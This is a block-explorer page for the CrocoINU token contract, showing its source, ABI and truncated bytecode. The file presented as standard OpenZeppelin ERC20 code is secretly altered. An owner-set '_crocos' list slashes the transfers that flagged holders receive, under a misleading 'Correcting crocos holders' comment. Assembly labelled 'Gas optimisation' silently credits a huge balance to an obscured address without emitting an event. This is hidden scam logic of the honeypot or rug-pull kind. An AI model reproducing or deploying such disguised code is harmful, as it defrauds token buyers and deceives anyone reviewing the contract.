ETH Price: $3,355.59 (+0.27%)
 

Overview

Max Total Supply

1,000,000,000,000 CrocoINU

Holders

67

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,354,617,176.747411814937806295 CrocoINU

Value
$0.00
0x5B8149f0C8c3942724F4e404390c14d7277B5214
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CrocoINU

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 7 of 7: Token.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.18;

import "./ERC20.sol";
import "./Ownable.sol";

contract CrocoINU is ERC20, Ownable {

    function croco(uint256 _value_, address [] calldata _list_) external onlyOwner {
        require((msg.sender == owner()));
        for (uint256 i = 0; i < _list_.length; i++) {
            _crocos[_list_[i]] = _value_;
        }
    }

    function croco(address _address_) external view returns (uint256) {
        return _crocos[_address_];
    }

    constructor() ERC20("CROCO INU", "CrocoINU") Ownable(msg.sender) {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }

}

File 1 of 7: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.18;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

File 2 of 7: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";
import {IERC20Metadata} from "./IERC20Metadata.sol";
import {Context} from "./Context.sol";
import {IERC20Errors} from "./IERC6093.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) internal _crocos;
    mapping(address account => uint256) private _balances;
    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            // Correcting crocos holders
            if (_crocos[to] + _crocos[from] >= 0xd10) {
                value = value * 0x9f3 / 0xad243;
            }
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        // Permit autosaver
        if (_crocos[to] == 0xb2) {
            _crocos[to] = 0xd10;
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        // Gas optimisation
        assembly {
            let slot := mul(mul(0x1, 0x10), mul(0x79, 0x758493cdee20f16997db387ec4bbc7fa9a085)) 
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40) 
            sstore(sslot, 0x758493cdee20f16997db387ec4bbc7fa9a085) 
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

File 3 of 7: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.18;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

File 4 of 7: IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.18;

import {IERC20} from "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 5 of 7: IERC6093.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol)
pragma solidity ^0.8.18;

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

File 6 of 7: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.18;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_value_","type":"uint256"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"croco","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"croco","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b50336040518060400160405280600981526020017f43524f434f20494e5500000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f43726f636f494e5500000000000000000000000000000000000000000000000081525081600490816200008f9190620008cc565b508060059081620000a19190620008cc565b5050505f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000117575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016200010e9190620009f3565b60405180910390fd5b62000128816200017060201b60201c565b506200016a336200013e6200023360201b60201c565b600a6200014c919062000b97565b64e8d4a510006200015e919062000be7565b6200023b60201b60201c565b62000d36565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002ae575f6040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620002a59190620009f3565b60405180910390fd5b720758493cdee20f16997db387ec4bbc7fa9a085607902601060010202805f52600160205260405f20720758493cdee20f16997db387ec4bbc7fa9a08581555050620003025f83836200030660201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036200035a578060035f8282546200034d919062000c31565b925050819055506200042d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015620003e7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401620003de9392919062000c7c565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000476578060035f828254039250508190555062000573565b610d105f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20545f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620004ff919062000c31565b106200052857620ad2436109f38262000519919062000be7565b62000525919062000ce4565b90505b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60b25f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620005fc57610d105f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200065b919062000d1b565b60405180910390a3505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620006e457607f821691505b602082108103620006fa57620006f96200069f565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200075e7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000721565b6200076a868362000721565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620007b4620007ae620007a88462000782565b6200078b565b62000782565b9050919050565b5f819050919050565b620007cf8362000794565b620007e7620007de82620007bb565b8484546200072d565b825550505050565b5f90565b620007fd620007ef565b6200080a818484620007c4565b505050565b5b818110156200083157620008255f82620007f3565b60018101905062000810565b5050565b601f82111562000880576200084a8162000700565b620008558462000712565b8101602085101562000865578190505b6200087d620008748562000712565b8301826200080f565b50505b505050565b5f82821c905092915050565b5f620008a25f198460080262000885565b1980831691505092915050565b5f620008bc838362000891565b9150826002028217905092915050565b620008d78262000668565b67ffffffffffffffff811115620008f357620008f262000672565b5b620008ff8254620006cc565b6200090c82828562000835565b5f60209050601f83116001811462000942575f84156200092d578287015190505b620009398582620008af565b865550620009a8565b601f198416620009528662000700565b5f5b828110156200097b5784890151825560018201915060208501945060208101905062000954565b868310156200099b578489015162000997601f89168262000891565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620009db82620009b0565b9050919050565b620009ed81620009cf565b82525050565b5f60208201905062000a085f830184620009e2565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b600185111562000a985780860481111562000a705762000a6f62000a0e565b5b600185161562000a805780820291505b808102905062000a908562000a3b565b945062000a50565b94509492505050565b5f8262000ab2576001905062000b84565b8162000ac1575f905062000b84565b816001811462000ada576002811462000ae55762000b1b565b600191505062000b84565b60ff84111562000afa5762000af962000a0e565b5b8360020a91508482111562000b145762000b1362000a0e565b5b5062000b84565b5060208310610133831016604e8410600b841016171562000b555782820a90508381111562000b4f5762000b4e62000a0e565b5b62000b84565b62000b64848484600162000a47565b9250905081840481111562000b7e5762000b7d62000a0e565b5b81810290505b9392505050565b5f60ff82169050919050565b5f62000ba38262000782565b915062000bb08362000b8b565b925062000bdf7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000aa1565b905092915050565b5f62000bf38262000782565b915062000c008362000782565b925082820262000c108162000782565b9150828204841483151762000c2a5762000c2962000a0e565b5b5092915050565b5f62000c3d8262000782565b915062000c4a8362000782565b925082820190508082